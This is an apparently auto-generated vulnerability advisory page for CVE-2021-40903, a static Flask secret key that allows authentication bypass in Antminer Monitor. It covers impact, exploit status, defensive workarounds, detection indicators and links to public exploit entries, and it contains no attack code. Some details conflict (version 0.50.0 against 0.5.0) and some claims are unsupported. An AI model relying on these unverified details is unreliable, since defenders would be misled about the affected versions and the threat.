CVE-2021-40903 – CVE-2021-40903 is an authentication bypass vuln... (How to Fix)

Q: What is the severity of CVE-2021-40903?

CVE-2021-40903 has a CVSS score of 9.8 (CRITICAL). CVE-2021-40903 is an authentication bypass vulnerability in Antminer Monitor 0.50.0 due to a static secret string in Flask server settings instead of random generation. This allows attackers to bypass authentication and gain unauthorized access to the monitoring interface. Anyone running Antminer Monitor 0.50.0 with default configuration is affected.

📋 TL;DR

CVE-2021-40903 is an authentication bypass vulnerability in Antminer Monitor 0.50.0 due to a static secret string in Flask server settings instead of random generation. This allows attackers to bypass authentication and gain unauthorized access to the monitoring interface. Anyone running Antminer Monitor 0.50.0 with default configuration is affected.

💻 Affected Systems

Products:

Antminer Monitor

Versions: 0.50.0

Operating Systems: Linux, Windows, All platforms running Flask

Default Config Vulnerable: ⚠️ Yes

Notes: Only affects version 0.50.0. Earlier versions may have different configurations.

📦 What is this software?

Antminer Monitor by Antminer Monitor Project

View all CVEs affecting Antminer Monitor →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete compromise of the Antminer monitoring system, allowing attackers to reconfigure mining operations, steal cryptocurrency, or use the system as an entry point to the network.

🟠

Likely Case

Unauthorized access to monitor and potentially control connected Antminer devices, leading to mining disruption or configuration changes.

🟢

If Mitigated

Limited impact if system is isolated from internet and has strict network controls, though authentication bypass remains possible locally.

🌐 Internet-Facing: HIGH - Directly exposed instances can be easily discovered and exploited without authentication.

🏢 Internal Only: HIGH - Even internally, the static secret allows any user with network access to bypass authentication.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: CONFIRMED

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Exploit requires network access to the Flask server. Public exploit code demonstrates simple authentication bypass using the static secret.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Not available

Vendor Advisory: Not available

Restart Required: No

Instructions:

No official patch exists. Upgrade to a newer version if available, or implement workarounds.

🔧 Temporary Workarounds

Modify Flask Secret Key

linux

Change the static secret key in settings.py to a randomly generated secure value

sed -i "s/SECRET_KEY = 'static-secret'/SECRET_KEY = '$(openssl rand -hex 32)'/g" settings.py

Implement Network Access Controls

linux

Restrict access to the Flask server to trusted IP addresses only

iptables -A INPUT -p tcp --dport 5000 -s trusted_ip -j ACCEPT
iptables -A INPUT -p tcp --dport 5000 -j DROP

🧯 If You Can't Patch

Isolate the Antminer Monitor system from internet and restrict internal network access
Implement additional authentication layer (e.g., reverse proxy with authentication)

🔍 How to Verify

Check if Vulnerable:

Check if Antminer Monitor version is 0.50.0 and examine settings.py for static SECRET_KEY value

Check Version:

Check version in application interface or configuration files

Verify Fix Applied:

Verify SECRET_KEY in settings.py has been changed from default and is a random value

📡 Detection & Monitoring

Log Indicators:

Unauthorized access attempts
Authentication bypass logs
Unexpected configuration changes

Network Indicators:

Unusual traffic to Flask server port (default 5000)
Requests with crafted authentication tokens

SIEM Query:

source="antminer-monitor" AND (event="auth_failure" OR event="config_change")

📊 Metadata

CVE ID: CVE-2021-40903

CVSS v3 Score: 9.8 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-798

Published: June 17, 2022

Last Updated: November 21, 2024

🔗 References

https://github.com/anselal/antminer-monitor Product
https://packetstormsecurity.com/files/164048/Antminer-Monitor-0.5.0-Authentication-Bypass.html Exploit,Third Party Advisory,VDB Entry
https://www.exploit-db.com/exploits/50267 Exploit,Third Party Advisory,VDB Entry
https://github.com/anselal/antminer-monitor Product
https://packetstormsecurity.com/files/164048/Antminer-Monitor-0.5.0-Authentication-Bypass.html Exploit,Third Party Advisory,VDB Entry
https://www.exploit-db.com/exploits/50267 Exploit,Third Party Advisory,VDB Entry

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2021-40903, you might also want to check these: